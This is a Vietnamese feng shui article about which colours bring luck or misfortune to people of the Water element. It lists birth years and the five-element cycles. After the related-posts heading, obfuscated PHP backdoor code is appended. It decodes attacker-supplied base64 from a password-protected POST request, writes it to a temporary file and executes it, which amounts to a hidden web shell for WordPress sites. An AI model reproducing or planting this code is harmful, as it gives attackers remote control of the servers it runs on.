Mệnh Thủy hợp với màu gì? Màu sắc cho người mệnh Thủy

Màu sắc trong phong thủy là vấn đề được nhiều người quan tâm, mỗi màu sắc tương ứng với một hành khác nhau trong ngũ hành. Những yếu tố trong ngũ hành có tác động ít nhiều lên các phương diện trong cuộc sống của mỗi người. Vì thế nên việc lựa chọn màu sắc hợp phong thủy là rất cần thiết, nếu bạn chọn những màu hợp mệnh sẽ mang lại may mắn, thuận lợi, ngược lại, nếu bạn chọn những màu khắc mệnh sẽ gặp những vấn đề khó khăn, trục trặc trong cuộc sống hàng ngày.

Đối với người thuộc mệnh Thủy hợp với màu gì, màu sắc nào hợp mệnh, đem lại may mắn? Dưới đây là những màu sắc hợp mệnh Thủy giúp đem lại tài lộc, hanh thông.

Mệnh Thủy hợp với màu gì? Màu sắc cho người mệnh Thủy-1

Các tuổi thuộc mệnh Thủy

Năm Bính Tý: 1936, 1996

Năm Quý Tỵ: 1953, 2013

Năm Nhâm Tuất: 1982, 1922

Năm Đinh Sửu: 1937, 1997

Năm Bính Ngọ: 1966, 2026

Năm Quý Hợi: 1983, 1923

Năm Giáp Thân: 1944, 2004

Năm Đinh Mùi: 1967, 2027

Năm Ất Dậu: 1945, 2005

Năm Giáp Dần: 1974, 2034

Năm Nhâm Thìn: 1952, 2012

Năm Ất Mão: 1975, 2035

Quy luật âm dương, ngũ hành

Theo nguyên lý ngũ hành, môi trường gồm 5 yếu tố Kim (kim loại), Mộc (cây cỏ), Thủy (nước), Hỏa (lửa), Thổ (đất). Các yếu tố này tác động qua lại trực tiếp, tương sinh tương khắc tạo nên một vòng tuần hoàn về sự tồn tại của vạn vật.

Xem Thêm  Lễ cúng tạ mộ mới xây, thanh minh, cuối năm gồm những gì?

Mệnh Thủy hợp với màu gì? Màu sắc cho người mệnh Thủy-2

Mối quan hệ tương sinh trong ngũ hành:

Tương sinh là những tác động tương hỗ lẫn nhau giữa các yếu tố trong ngũ hành, yếu tố này hỗ trợ cho yếu tố kia phát triển. Chúng có quan hệ tiếp xúc, hỗ trợ lẫn nhau. Cụ thể là:

– Mộc sinh Hỏa (cây cháy tạo ra lửa).

– Hỏa sinh Thổ (lửa khiến mọi thứ hóa thành tro bụi và chuyển hóa thành đất).

– Thổ sinh kim (Kim loại được hình thành từ trong lòng đất)

– Kim Sinh Thủy (kim loại khi bị nóng chảy tạo thành dung dịch lỏng).

– Thủy sinh Mộc (cây nhờ nước mà sinh trưởng, phát triển).

Mối quan hệ tương khắc trong ngũ hành:

Tương khắc là sự khắc chế nhau của các yếu tố trong ngũ hành, chúng chống chọi nhau, kìm hãm sự phát triển của nhau. Cụ thể là:

– Thủy khắc Hỏa (nước dập được đám cháy của lửa)

– Hỏa khắc Kim (lửa khiến cho kim loại bị nóng chảy)

– Kim khắc Mộc (dao kéo được rèn bằng kim loại để chặt cây)

– Mộc khắc Thổ (cây hút chất dinh dưỡng của đất)

– Thổ khắc Thủy (đất cản trở dòng chảy của nước lũ)

Hai hiện tượng tương sinh và tương khắc luôn tồn tại song song theo quy luật tự nhiên. Điều này có ý nghĩa để duy trì sự phát triển vừa đủ của vạn vật trên thế giới. Việc lựa chọn màu sắc cho mỗi hành cũng dựa vào nguyên tắc sinh-khắc của các yếu tố trong ngũ hành mà ra.

Xem Thêm  Những hình xăm đẹp hợp mệnh Hỏa dành cho nam và nữ

Mệnh Thủy hợp màu gì, khắc màu gì?

Màu sắc có ảnh hưởng nhiều đến cuộc sống của mỗi người, mỗi một màu sắc mang ý nghĩa phong thủy khác nhau. Màu sắc cũng có thể cho thấy được tính cách của một người thông qua những lý luận về ngũ hành của các nhà phong thủy. Nếu bạn thuộc mệnh Thủy thì nên lựa chọn những màu sắc mệnh Thủy hoặc những màu thuộc mệnh tương sinh để hỗ trợ cho sự phát triển thuận lợi trong cuộc sống.

Mệnh Thủy hợp với màu gì? Màu sắc cho người mệnh Thủy-3

1. Màu tương sinh với mệnh Thủy

– Màu đen, xanh dương: Những màu này phù hợp với người mệnh Thủy. Màu đen đại diện cho sự mạnh mẽ, quyết liệt như tính cách của người mệnh Thủy, màu xanh dương là màu của nước biển, màu của những niềm tìn, hy vọng lớn lao và tấm lòng rộng lớn như đại dương bao la. Những màu này có tác dụng hỗ trợ cho người mệnh Thủy gặp nhiều thuận lợi trong cuộc sống.

– Màu trắng: Màu trắng là màu đại diện cho mệnh Kim, mà Kim sinh Thủy nên rất hợp với người mệnh Thủy. Sử dụng những vật dụng, nhà, xe,… có màu trắng sẽ giúp bạn gặp nhiều may mắn, tài lộc, thuận buồm xuôi gió trong mọi việc.

2. Màu tương khắc với mệnh Thủy

– Đỏ, cam, tím: Đây là những màu thuộc hành Hỏa, mà Hỏa khắc Thủy nên người thuộc mệnh Thủy sẽ khắc với những màu này. Nên hạn chế sử dụng đồ đạc, quần áo,… có màu này để tránh gặp những điều không may xảy đến.

Xem Thêm  Hoa ưu đàm là gì trong Phật giáo? Ý nghĩa loài hoa 3000 năm nở 1 lần

– Vàng, nâu đất, nâu nhạt: Những màu này thuộc hành Thổ, mà Thổ cũng khắc với Thủy, cho nên người mệnh Thủy cần tránh những màu kể trên bởi nó sẽ tiết chế sự may mắn, giàu sang của bạn.

– Màu xanh lá cây: Màu này thuộc mệnh Mộc, mà Thủy lại là hành hỗ trợ cho Mộc, lấy đi năng lượng của Thủy giúp Mộc phát triển. Vì thế, người mệnh Thủy không nên sử dụng những thứ có màu xanh lá cây, nó sẽ làm giảm hao năng lượng, con đường công danh gặp trắc trở.

Những phân tích trên đây đã giải đáp cho câu hỏi “mệnh Thổ hợp với màu gì?” một cách cụ thể. Màu sắc không chỉ giúp bạn tô điểm cho cuộc sống mà còn có tác dụng mang đến may mắn cho bạn. Từ những quyết định lớn lao như xây nhà, mua xe cho đến những điều nhỏ nhặt hàng ngày trong cuộc sống như quần áo, vật dụng,… thì bạn nên lựa chọn những màu sắc hợp với mệnh của mình để mang lại nhiều may mắn và những điều tốt lành cho chính mình.

Bài Liên Quan:

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}